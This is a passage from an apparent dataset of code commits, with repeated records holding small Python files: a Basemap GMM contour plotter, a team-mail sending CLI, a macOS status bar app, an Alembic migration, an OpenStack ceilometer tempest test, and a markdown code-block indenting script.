plt.plot(lat, lon, '*b')
#plots the center of each ellipse and weights the size relative to the weight of the ellipse on the model
for i in range (0, gmm.n_components):
lat, lon = gmm.means_[i]
weight = gmm.weights_[i]
x, y = m(lon, lat)
plt.plot(x, y, 'ok', markersize=10*weight)
plt.show()
|
Add a method which will plot the countour map of a GMM on a map of the world as well as the best location and true position if given
|
Add a method which will plot the countour map of a GMM on a map of the world as well as the best location and true position if given
|
Python
|
apache-2.0
|
vivek8943/soft-boiled
|
Add a method which will plot the countour map of a GMM on a map of the world as well as the best location and true position if given
|
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
@staticmethod
def plot_gmm(gmm, true_ll=False):
"""Plots the contour map of a GMM on top of a world map
Partially from: http://matplotlib.org/basemap/users/examples.html
Will also plot the best estimated location as well as a true location if passed in"""
plt.figure()
x = np.linspace(-180,180, num=3600)
y = np.linspace(90,-90, num=180)
#GMM uses lat, lon so must flip in to obtain the contours correctly
X, Y = np.meshgrid(y,x)
XX = np.array([X.ravel(), Y.ravel()]).T
#Obtains the per-sample log probabilities of the data under the model
Z = -gmm.score_samples(XX)[0]
Z = Z.reshape(X.shape)
#set up and draw the world map
m = Basemap(projection='mill', lon_0=0)
m.drawcountries()
m.drawcoastlines()
m.drawparallels(np.arange(-90.,120.,30.),labels=[1,0,0,0]) # draw parallels
m.drawmeridians(np.arange(0.,420.,60.),labels=[0,0,0,1]) # draw meridians
cmap = mpl.cm.pink
#for plotting we want to be back in lon, lat space so flip back
X, Y = m(Y,X)
#plot the contour lines as well as a color bar
CS = m.contourf(X, Y, Z, 25, cmap=cmap)
CB = plt.colorbar(CS, shrink=0.8, extend='both')
# Plot estimated location
(best_lat, best_lon) = gmm.means_[np.argmax(gmm.weights_)]
best_lat, best_lon = m(best_lon, best_lat)
plt.plot(best_lat, best_lon, '*g')
# If provided also plot the true lat/lon expected to come in as lat,lon
if true_ll:
lat, lon = m(true_ll[1], true_ll[0])
plt.plot(lat, lon, '*b')
#plots the center of each ellipse and weights the size relative to the weight of the ellipse on the model
for i in range (0, gmm.n_components):
lat, lon = gmm.means_[i]
weight = gmm.weights_[i]
x, y = m(lon, lat)
plt.plot(x, y, 'ok', markersize=10*weight)
plt.show()
|
<commit_before><commit_msg>Add a method which will plot the countour map of a GMM on a map of the world as well as the best location and true position if given<commit_after>
|
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
@staticmethod
def plot_gmm(gmm, true_ll=False):
"""Plots the contour map of a GMM on top of a world map
Partially from: http://matplotlib.org/basemap/users/examples.html
Will also plot the best estimated location as well as a true location if passed in"""
plt.figure()
x = np.linspace(-180,180, num=3600)
y = np.linspace(90,-90, num=180)
#GMM uses lat, lon so must flip in to obtain the contours correctly
X, Y = np.meshgrid(y,x)
XX = np.array([X.ravel(), Y.ravel()]).T
#Obtains the per-sample log probabilities of the data under the model
Z = -gmm.score_samples(XX)[0]
Z = Z.reshape(X.shape)
#set up and draw the world map
m = Basemap(projection='mill', lon_0=0)
m.drawcountries()
m.drawcoastlines()
m.drawparallels(np.arange(-90.,120.,30.),labels=[1,0,0,0]) # draw parallels
m.drawmeridians(np.arange(0.,420.,60.),labels=[0,0,0,1]) # draw meridians
cmap = mpl.cm.pink
#for plotting we want to be back in lon, lat space so flip back
X, Y = m(Y,X)
#plot the contour lines as well as a color bar
CS = m.contourf(X, Y, Z, 25, cmap=cmap)
CB = plt.colorbar(CS, shrink=0.8, extend='both')
# Plot estimated location
(best_lat, best_lon) = gmm.means_[np.argmax(gmm.weights_)]
best_lat, best_lon = m(best_lon, best_lat)
plt.plot(best_lat, best_lon, '*g')
# If provided also plot the true lat/lon expected to come in as lat,lon
if true_ll:
lat, lon = m(true_ll[1], true_ll[0])
plt.plot(lat, lon, '*b')
#plots the center of each ellipse and weights the size relative to the weight of the ellipse on the model
for i in range (0, gmm.n_components):
lat, lon = gmm.means_[i]
weight = gmm.weights_[i]
x, y = m(lon, lat)
plt.plot(x, y, 'ok', markersize=10*weight)
plt.show()
|
Add a method which will plot the countour map of a GMM on a map of the world as well as the best location and true position if givenimport numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
@staticmethod
def plot_gmm(gmm, true_ll=False):
"""Plots the contour map of a GMM on top of a world map
Partially from: http://matplotlib.org/basemap/users/examples.html
Will also plot the best estimated location as well as a true location if passed in"""
plt.figure()
x = np.linspace(-180,180, num=3600)
y = np.linspace(90,-90, num=180)
#GMM uses lat, lon so must flip in to obtain the contours correctly
X, Y = np.meshgrid(y,x)
XX = np.array([X.ravel(), Y.ravel()]).T
#Obtains the per-sample log probabilities of the data under the model
Z = -gmm.score_samples(XX)[0]
Z = Z.reshape(X.shape)
#set up and draw the world map
m = Basemap(projection='mill', lon_0=0)
m.drawcountries()
m.drawcoastlines()
m.drawparallels(np.arange(-90.,120.,30.),labels=[1,0,0,0]) # draw parallels
m.drawmeridians(np.arange(0.,420.,60.),labels=[0,0,0,1]) # draw meridians
cmap = mpl.cm.pink
#for plotting we want to be back in lon, lat space so flip back
X, Y = m(Y,X)
#plot the contour lines as well as a color bar
CS = m.contourf(X, Y, Z, 25, cmap=cmap)
CB = plt.colorbar(CS, shrink=0.8, extend='both')
# Plot estimated location
(best_lat, best_lon) = gmm.means_[np.argmax(gmm.weights_)]
best_lat, best_lon = m(best_lon, best_lat)
plt.plot(best_lat, best_lon, '*g')
# If provided also plot the true lat/lon expected to come in as lat,lon
if true_ll:
lat, lon = m(true_ll[1], true_ll[0])
plt.plot(lat, lon, '*b')
#plots the center of each ellipse and weights the size relative to the weight of the ellipse on the model
for i in range (0, gmm.n_components):
lat, lon = gmm.means_[i]
weight = gmm.weights_[i]
x, y = m(lon, lat)
plt.plot(x, y, 'ok', markersize=10*weight)
plt.show()
|
<commit_before><commit_msg>Add a method which will plot the countour map of a GMM on a map of the world as well as the best location and true position if given<commit_after>import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
@staticmethod
def plot_gmm(gmm, true_ll=False):
"""Plots the contour map of a GMM on top of a world map
Partially from: http://matplotlib.org/basemap/users/examples.html
Will also plot the best estimated location as well as a true location if passed in"""
plt.figure()
x = np.linspace(-180,180, num=3600)
y = np.linspace(90,-90, num=180)
#GMM uses lat, lon so must flip in to obtain the contours correctly
X, Y = np.meshgrid(y,x)
XX = np.array([X.ravel(), Y.ravel()]).T
#Obtains the per-sample log probabilities of the data under the model
Z = -gmm.score_samples(XX)[0]
Z = Z.reshape(X.shape)
#set up and draw the world map
m = Basemap(projection='mill', lon_0=0)
m.drawcountries()
m.drawcoastlines()
m.drawparallels(np.arange(-90.,120.,30.),labels=[1,0,0,0]) # draw parallels
m.drawmeridians(np.arange(0.,420.,60.),labels=[0,0,0,1]) # draw meridians
cmap = mpl.cm.pink
#for plotting we want to be back in lon, lat space so flip back
X, Y = m(Y,X)
#plot the contour lines as well as a color bar
CS = m.contourf(X, Y, Z, 25, cmap=cmap)
CB = plt.colorbar(CS, shrink=0.8, extend='both')
# Plot estimated location
(best_lat, best_lon) = gmm.means_[np.argmax(gmm.weights_)]
best_lat, best_lon = m(best_lon, best_lat)
plt.plot(best_lat, best_lon, '*g')
# If provided also plot the true lat/lon expected to come in as lat,lon
if true_ll:
lat, lon = m(true_ll[1], true_ll[0])
plt.plot(lat, lon, '*b')
#plots the center of each ellipse and weights the size relative to the weight of the ellipse on the model
for i in range (0, gmm.n_components):
lat, lon = gmm.means_[i]
weight = gmm.weights_[i]
x, y = m(lon, lat)
plt.plot(x, y, 'ok', markersize=10*weight)
plt.show()
|
|
da87b9fafcb1bec8541d11f1f2650c7cd86c22c0
|
src/send_mails.py
|
src/send_mails.py
|
from argparse import ArgumentParser
from teammails import informal_to_teams
def parse_args():
args = ArgumentParser()
args.add_argument("--nodebug", help="do really send the mails to the teams", action="store_true")
subs = args.add_subparsers()
informal = subs.add_parser("informal", help="send informal mails")
informal.add_argument("-s", "--subject", help="set the mail subject", required=True)
informal.add_argument("-t", "--templatename", help="set the name of the template to use", required=True)
informal.set_defaults(func=cmd_send_informal)
return args.parse_args()
def cmd_send_informal(args):
informal_to_teams(args.templatename, args.subject, not args.nodebug)
if __name__ == "__main__":
args = parse_args()
args.func(args)
|
Add a script to invoke the mail sending.
|
Add a script to invoke the mail sending.
|
Python
|
bsd-3-clause
|
eXma/meet-and-eat-registration-system,eXma/meet-and-eat-registration-system,janLo/meet-and-eat-registration-system,eXma/meet-and-eat-registration-system,janLo/meet-and-eat-registration-system,janLo/meet-and-eat-registration-system,janLo/meet-and-eat-registration-system,eXma/meet-and-eat-registration-system
|
Add a script to invoke the mail sending.
|
from argparse import ArgumentParser
from teammails import informal_to_teams
def parse_args():
args = ArgumentParser()
args.add_argument("--nodebug", help="do really send the mails to the teams", action="store_true")
subs = args.add_subparsers()
informal = subs.add_parser("informal", help="send informal mails")
informal.add_argument("-s", "--subject", help="set the mail subject", required=True)
informal.add_argument("-t", "--templatename", help="set the name of the template to use", required=True)
informal.set_defaults(func=cmd_send_informal)
return args.parse_args()
def cmd_send_informal(args):
informal_to_teams(args.templatename, args.subject, not args.nodebug)
if __name__ == "__main__":
args = parse_args()
args.func(args)
|
<commit_before><commit_msg>Add a script to invoke the mail sending.<commit_after>
|
from argparse import ArgumentParser
from teammails import informal_to_teams
def parse_args():
args = ArgumentParser()
args.add_argument("--nodebug", help="do really send the mails to the teams", action="store_true")
subs = args.add_subparsers()
informal = subs.add_parser("informal", help="send informal mails")
informal.add_argument("-s", "--subject", help="set the mail subject", required=True)
informal.add_argument("-t", "--templatename", help="set the name of the template to use", required=True)
informal.set_defaults(func=cmd_send_informal)
return args.parse_args()
def cmd_send_informal(args):
informal_to_teams(args.templatename, args.subject, not args.nodebug)
if __name__ == "__main__":
args = parse_args()
args.func(args)
|
Add a script to invoke the mail sending.from argparse import ArgumentParser
from teammails import informal_to_teams
def parse_args():
args = ArgumentParser()
args.add_argument("--nodebug", help="do really send the mails to the teams", action="store_true")
subs = args.add_subparsers()
informal = subs.add_parser("informal", help="send informal mails")
informal.add_argument("-s", "--subject", help="set the mail subject", required=True)
informal.add_argument("-t", "--templatename", help="set the name of the template to use", required=True)
informal.set_defaults(func=cmd_send_informal)
return args.parse_args()
def cmd_send_informal(args):
informal_to_teams(args.templatename, args.subject, not args.nodebug)
if __name__ == "__main__":
args = parse_args()
args.func(args)
|
<commit_before><commit_msg>Add a script to invoke the mail sending.<commit_after>from argparse import ArgumentParser
from teammails import informal_to_teams
def parse_args():
args = ArgumentParser()
args.add_argument("--nodebug", help="do really send the mails to the teams", action="store_true")
subs = args.add_subparsers()
informal = subs.add_parser("informal", help="send informal mails")
informal.add_argument("-s", "--subject", help="set the mail subject", required=True)
informal.add_argument("-t", "--templatename", help="set the name of the template to use", required=True)
informal.set_defaults(func=cmd_send_informal)
return args.parse_args()
def cmd_send_informal(args):
informal_to_teams(args.templatename, args.subject, not args.nodebug)
if __name__ == "__main__":
args = parse_args()
args.func(args)
|
|
a4b5e6f522e3c9af502e6fbddd0dbefbae491c2e
|
src/server/app.py
|
src/server/app.py
|
import rumps
import threading
from server import CamsketchServer
class CamsketchStatusBarApp(rumps.App):
def __init__(self, address):
super(CamsketchStatusBarApp, self).__init__("Camsketch")
self.menu = [address]
if __name__ == "__main__":
server = CamsketchServer()
threading.Thread(target=server.serve_forever).start()
app = CamsketchStatusBarApp(server.address)
app.run()
server.shutdown()
|
Add status bar module to server.
|
Add status bar module to server.
|
Python
|
mit
|
pdubroy/camsketch,pdubroy/camsketch,pdubroy/camsketch,pdubroy/camsketch
|
Add status bar module to server.
|
import rumps
import threading
from server import CamsketchServer
class CamsketchStatusBarApp(rumps.App):
def __init__(self, address):
super(CamsketchStatusBarApp, self).__init__("Camsketch")
self.menu = [address]
if __name__ == "__main__":
server = CamsketchServer()
threading.Thread(target=server.serve_forever).start()
app = CamsketchStatusBarApp(server.address)
app.run()
server.shutdown()
|
<commit_before><commit_msg>Add status bar module to server.<commit_after>
|
import rumps
import threading
from server import CamsketchServer
class CamsketchStatusBarApp(rumps.App):
def __init__(self, address):
super(CamsketchStatusBarApp, self).__init__("Camsketch")
self.menu = [address]
if __name__ == "__main__":
server = CamsketchServer()
threading.Thread(target=server.serve_forever).start()
app = CamsketchStatusBarApp(server.address)
app.run()
server.shutdown()
|
Add status bar module to server.import rumps
import threading
from server import CamsketchServer
class CamsketchStatusBarApp(rumps.App):
def __init__(self, address):
super(CamsketchStatusBarApp, self).__init__("Camsketch")
self.menu = [address]
if __name__ == "__main__":
server = CamsketchServer()
threading.Thread(target=server.serve_forever).start()
app = CamsketchStatusBarApp(server.address)
app.run()
server.shutdown()
|
<commit_before><commit_msg>Add status bar module to server.<commit_after>import rumps
import threading
from server import CamsketchServer
class CamsketchStatusBarApp(rumps.App):
def __init__(self, address):
super(CamsketchStatusBarApp, self).__init__("Camsketch")
self.menu = [address]
if __name__ == "__main__":
server = CamsketchServer()
threading.Thread(target=server.serve_forever).start()
app = CamsketchStatusBarApp(server.address)
app.run()
server.shutdown()
|
|
ed56e054d74be6d77209aa03fd532d8a9e9f4e98
|
zou/migrations/versions/818f7bda2528_.py
|
zou/migrations/versions/818f7bda2528_.py
|
"""empty message
Revision ID: 818f7bda2528
Revises: bf1347acdee2
Create Date: 2018-04-10 22:45:19.462757
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '818f7bda2528'
down_revision = 'bf1347acdee2'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('preview_file', sa.Column('path', sa.String(length=400), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('preview_file', 'path')
# ### end Alembic commands ###
|
Add migration file for preview path field
|
Add migration file for preview path field
|
Python
|
agpl-3.0
|
cgwire/zou
|
Add migration file for preview path field
|
"""empty message
Revision ID: 818f7bda2528
Revises: bf1347acdee2
Create Date: 2018-04-10 22:45:19.462757
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '818f7bda2528'
down_revision = 'bf1347acdee2'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('preview_file', sa.Column('path', sa.String(length=400), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('preview_file', 'path')
# ### end Alembic commands ###
|
<commit_before><commit_msg>Add migration file for preview path field<commit_after>
|
"""empty message
Revision ID: 818f7bda2528
Revises: bf1347acdee2
Create Date: 2018-04-10 22:45:19.462757
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '818f7bda2528'
down_revision = 'bf1347acdee2'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('preview_file', sa.Column('path', sa.String(length=400), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('preview_file', 'path')
# ### end Alembic commands ###
|
Add migration file for preview path field"""empty message
Revision ID: 818f7bda2528
Revises: bf1347acdee2
Create Date: 2018-04-10 22:45:19.462757
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '818f7bda2528'
down_revision = 'bf1347acdee2'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('preview_file', sa.Column('path', sa.String(length=400), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('preview_file', 'path')
# ### end Alembic commands ###
|
<commit_before><commit_msg>Add migration file for preview path field<commit_after>"""empty message
Revision ID: 818f7bda2528
Revises: bf1347acdee2
Create Date: 2018-04-10 22:45:19.462757
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '818f7bda2528'
down_revision = 'bf1347acdee2'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('preview_file', sa.Column('path', sa.String(length=400), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('preview_file', 'path')
# ### end Alembic commands ###
|
|
069b48615b13540c2b1d4a4d62eeaa564416718c
|
contrib/tempest/tempest/scenario/congress_datasources/test_ceilometer.py
|
contrib/tempest/tempest/scenario/congress_datasources/test_ceilometer.py
|
# Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest import clients
from tempest import config
from tempest import exceptions
from tempest.openstack.common import log as logging
from tempest.scenario import manager_congress
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class TestCeilometerDriver(manager_congress.ScenarioPolicyBase):
@classmethod
def check_preconditions(cls):
super(TestCeilometerDriver, cls).check_preconditions()
def setUp(cls):
super(TestCeilometerDriver, cls).setUp()
if not CONF.service_available.ceilometer:
msg = ("%s skipped as ceilometer is not available" % cls.__name__)
raise cls.skipException(msg)
cls.os = clients.Manager(cls.admin_credentials())
cls.telemetry_client = cls.os.telemetry_client
@test.attr(type='smoke')
def test_ceilometer_meters_table(self):
_, meters = self.telemetry_client.list_meters()
meter_map = {}
for meter in meters:
meter_map[meter['meter_id']] = meter
meter_schema = \
self.admin_manager.congress_client.show_datasource_table_schema(
'ceilometer', 'meters')['columns']
def _check_data_table_ceilometer_meters():
results = \
self.admin_manager.congress_client.list_datasource_rows(
'ceilometer', 'meters')
for row in results['results']:
meter_row = meter_map[row['data'][0]]
for index in range(len(meter_schema)):
if (str(row['data'][index]) !=
str(meter_row[meter_schema[index]['name']])):
return False
return True
if not test.call_until_true(func=_check_data_table_ceilometer_meters,
duration=20, sleep_for=4):
raise exceptions.TimeoutException("Data did not converge in time "
"or failure in server")
|
Add tempest code coverage for ceilometer driver
|
Add tempest code coverage for ceilometer driver
Change-Id: I6dc9200d1096823e9046fbfcae3222ffb2c21ff5
Closes-Bug: #1378133
|
Python
|
apache-2.0
|
ekcs/congress,ramineni/my_congress,ekcs/congress,openstack/congress,ramineni/my_congress,ramineni/my_congress,openstack/congress,ramineni/my_congress,ekcs/congress,ekcs/congress
|
Add tempest code coverage for ceilometer driver
Change-Id: I6dc9200d1096823e9046fbfcae3222ffb2c21ff5
Closes-Bug: #1378133
|
# Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest import clients
from tempest import config
from tempest import exceptions
from tempest.openstack.common import log as logging
from tempest.scenario import manager_congress
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class TestCeilometerDriver(manager_congress.ScenarioPolicyBase):
@classmethod
def check_preconditions(cls):
super(TestCeilometerDriver, cls).check_preconditions()
def setUp(cls):
super(TestCeilometerDriver, cls).setUp()
if not CONF.service_available.ceilometer:
msg = ("%s skipped as ceilometer is not available" % cls.__name__)
raise cls.skipException(msg)
cls.os = clients.Manager(cls.admin_credentials())
cls.telemetry_client = cls.os.telemetry_client
@test.attr(type='smoke')
def test_ceilometer_meters_table(self):
_, meters = self.telemetry_client.list_meters()
meter_map = {}
for meter in meters:
meter_map[meter['meter_id']] = meter
meter_schema = \
self.admin_manager.congress_client.show_datasource_table_schema(
'ceilometer', 'meters')['columns']
def _check_data_table_ceilometer_meters():
results = \
self.admin_manager.congress_client.list_datasource_rows(
'ceilometer', 'meters')
for row in results['results']:
meter_row = meter_map[row['data'][0]]
for index in range(len(meter_schema)):
if (str(row['data'][index]) !=
str(meter_row[meter_schema[index]['name']])):
return False
return True
if not test.call_until_true(func=_check_data_table_ceilometer_meters,
duration=20, sleep_for=4):
raise exceptions.TimeoutException("Data did not converge in time "
"or failure in server")
|
<commit_before><commit_msg>Add tempest code coverage for ceilometer driver
Change-Id: I6dc9200d1096823e9046fbfcae3222ffb2c21ff5
Closes-Bug: #1378133<commit_after>
|
# Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest import clients
from tempest import config
from tempest import exceptions
from tempest.openstack.common import log as logging
from tempest.scenario import manager_congress
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class TestCeilometerDriver(manager_congress.ScenarioPolicyBase):
@classmethod
def check_preconditions(cls):
super(TestCeilometerDriver, cls).check_preconditions()
def setUp(cls):
super(TestCeilometerDriver, cls).setUp()
if not CONF.service_available.ceilometer:
msg = ("%s skipped as ceilometer is not available" % cls.__name__)
raise cls.skipException(msg)
cls.os = clients.Manager(cls.admin_credentials())
cls.telemetry_client = cls.os.telemetry_client
@test.attr(type='smoke')
def test_ceilometer_meters_table(self):
_, meters = self.telemetry_client.list_meters()
meter_map = {}
for meter in meters:
meter_map[meter['meter_id']] = meter
meter_schema = \
self.admin_manager.congress_client.show_datasource_table_schema(
'ceilometer', 'meters')['columns']
def _check_data_table_ceilometer_meters():
results = \
self.admin_manager.congress_client.list_datasource_rows(
'ceilometer', 'meters')
for row in results['results']:
meter_row = meter_map[row['data'][0]]
for index in range(len(meter_schema)):
if (str(row['data'][index]) !=
str(meter_row[meter_schema[index]['name']])):
return False
return True
if not test.call_until_true(func=_check_data_table_ceilometer_meters,
duration=20, sleep_for=4):
raise exceptions.TimeoutException("Data did not converge in time "
"or failure in server")
|
Add tempest code coverage for ceilometer driver
Change-Id: I6dc9200d1096823e9046fbfcae3222ffb2c21ff5
Closes-Bug: #1378133# Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest import clients
from tempest import config
from tempest import exceptions
from tempest.openstack.common import log as logging
from tempest.scenario import manager_congress
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class TestCeilometerDriver(manager_congress.ScenarioPolicyBase):
@classmethod
def check_preconditions(cls):
super(TestCeilometerDriver, cls).check_preconditions()
def setUp(cls):
super(TestCeilometerDriver, cls).setUp()
if not CONF.service_available.ceilometer:
msg = ("%s skipped as ceilometer is not available" % cls.__name__)
raise cls.skipException(msg)
cls.os = clients.Manager(cls.admin_credentials())
cls.telemetry_client = cls.os.telemetry_client
@test.attr(type='smoke')
def test_ceilometer_meters_table(self):
_, meters = self.telemetry_client.list_meters()
meter_map = {}
for meter in meters:
meter_map[meter['meter_id']] = meter
meter_schema = \
self.admin_manager.congress_client.show_datasource_table_schema(
'ceilometer', 'meters')['columns']
def _check_data_table_ceilometer_meters():
results = \
self.admin_manager.congress_client.list_datasource_rows(
'ceilometer', 'meters')
for row in results['results']:
meter_row = meter_map[row['data'][0]]
for index in range(len(meter_schema)):
if (str(row['data'][index]) !=
str(meter_row[meter_schema[index]['name']])):
return False
return True
if not test.call_until_true(func=_check_data_table_ceilometer_meters,
duration=20, sleep_for=4):
raise exceptions.TimeoutException("Data did not converge in time "
"or failure in server")
|
<commit_before><commit_msg>Add tempest code coverage for ceilometer driver
Change-Id: I6dc9200d1096823e9046fbfcae3222ffb2c21ff5
Closes-Bug: #1378133<commit_after># Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest import clients
from tempest import config
from tempest import exceptions
from tempest.openstack.common import log as logging
from tempest.scenario import manager_congress
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class TestCeilometerDriver(manager_congress.ScenarioPolicyBase):
@classmethod
def check_preconditions(cls):
super(TestCeilometerDriver, cls).check_preconditions()
def setUp(cls):
super(TestCeilometerDriver, cls).setUp()
if not CONF.service_available.ceilometer:
msg = ("%s skipped as ceilometer is not available" % cls.__name__)
raise cls.skipException(msg)
cls.os = clients.Manager(cls.admin_credentials())
cls.telemetry_client = cls.os.telemetry_client
@test.attr(type='smoke')
def test_ceilometer_meters_table(self):
_, meters = self.telemetry_client.list_meters()
meter_map = {}
for meter in meters:
meter_map[meter['meter_id']] = meter
meter_schema = \
self.admin_manager.congress_client.show_datasource_table_schema(
'ceilometer', 'meters')['columns']
def _check_data_table_ceilometer_meters():
results = \
self.admin_manager.congress_client.list_datasource_rows(
'ceilometer', 'meters')
for row in results['results']:
meter_row = meter_map[row['data'][0]]
for index in range(len(meter_schema)):
if (str(row['data'][index]) !=
str(meter_row[meter_schema[index]['name']])):
return False
return True
if not test.call_until_true(func=_check_data_table_ceilometer_meters,
duration=20, sleep_for=4):
raise exceptions.TimeoutException("Data did not converge in time "
"or failure in server")
|
|
f3a5546d39a6430f60c9a34f279bf1e7b22076da
|
small-functions/add-tab-for-nonstandard-md-code.py
|
small-functions/add-tab-for-nonstandard-md-code.py
|
#!/usr/bin/env python
#encoding:utf-8
import os
import time
def add_tab(path):
with open(path,'r') as f:
flag = False
data = ''
tmp = '111'
count = 0
while tmp != '':
tmp = f.readline()
if tmp == '```\n':
if flag:
flag = False
else:
flag = True
data += tmp
continue
if flag:
if tmp != '\n':
data += ' ' + tmp
# data += tmp[4:]
count += 1
else:
data += tmp
with open(path,'w') as f:
f.write(data)
return count
def traverse(rootDir):
list_dirs = os.walk(rootDir)
for root, dirs, files in list_dirs:
for d in dirs:
print os.path.join(root, d)
for f in files:
path = os.path.join(root, f)
if os.path.getmtime(path) > 1449214271 or os.path.getmtime(path) < 1449212309:
print '>>' + path + '\n modified ',
print add_tab(path),
print 'lines'
if __name__ == '__main__':
traverse('/home/hanks/kiya/blog/source/_posts')
|
USE STANDARD MARKDOWN GRAMMER!!!!! ESPECIALLY CODE!!
|
USE STANDARD MARKDOWN GRAMMER!!!!! ESPECIALLY CODE!!
|
Python
|
apache-2.0
|
kiya-z/Kython
|
USE STANDARD MARKDOWN GRAMMER!!!!! ESPECIALLY CODE!!
|
#!/usr/bin/env python
#encoding:utf-8
import os
import time
def add_tab(path):
with open(path,'r') as f:
flag = False
data = ''
tmp = '111'
count = 0
while tmp != '':
tmp = f.readline()
if tmp == '```\n':
if flag:
flag = False
else:
flag = True
data += tmp
continue
if flag:
if tmp != '\n':
data += ' ' + tmp
# data += tmp[4:]
count += 1
else:
data += tmp
with open(path,'w') as f:
f.write(data)
return count
def traverse(rootDir):
list_dirs = os.walk(rootDir)
for root, dirs, files in list_dirs:
for d in dirs:
print os.path.join(root, d)
for f in files:
path = os.path.join(root, f)
if os.path.getmtime(path) > 1449214271 or os.path.getmtime(path) < 1449212309:
print '>>' + path + '\n modified ',
print add_tab(path),
print 'lines'
if __name__ == '__main__':
traverse('/home/hanks/kiya/blog/source/_posts')
|
<commit_before><commit_msg>USE STANDARD MARKDOWN GRAMMER!!!!! ESPECIALLY CODE!!<commit_after>
|
#!/usr/bin/env python
#encoding:utf-8
import os
import time
def add_tab(path):
with open(path,'r') as f:
flag = False
data = ''
tmp = '111'
count = 0
while tmp != '':
tmp = f.readline()
if tmp == '```\n':
if flag:
flag = False
else:
flag = True
data += tmp
continue
if flag:
if tmp != '\n':
data += ' ' + tmp
# data += tmp[4:]
count += 1
else:
data += tmp
with open(path,'w') as f:
f.write(data)
return count
def traverse(rootDir):
list_dirs = os.walk(rootDir)
for root, dirs, files in list_dirs:
for d in dirs:
print os.path.join(root, d)
for f in files:
path = os.path.join(root, f)
if os.path.getmtime(path) > 1449214271 or os.path.getmtime(path) < 1449212309:
print '>>' + path + '\n modified ',
print add_tab(path),
print 'lines'
if __name__ == '__main__':
traverse('/home/hanks/kiya/blog/source/_posts')
|
USE STANDARD MARKDOWN GRAMMER!!!!! ESPECIALLY CODE!!#!/usr/bin/env python
#encoding:utf-8
import os
import time
def add_tab(path):
with open(path,'r') as f:
flag = False
data = ''
tmp = '111'
count = 0
while tmp != '':
tmp = f.readline()
if tmp == '```\n':
if flag:
flag = False
else:
flag = True
data += tmp
continue
if flag:
if tmp != '\n':
data += ' ' + tmp
# data += tmp[4:]
count += 1
else:
data += tmp
with open(path,'w') as f:
f.write(data)
return count
def traverse(rootDir):
list_dirs = os.walk(rootDir)
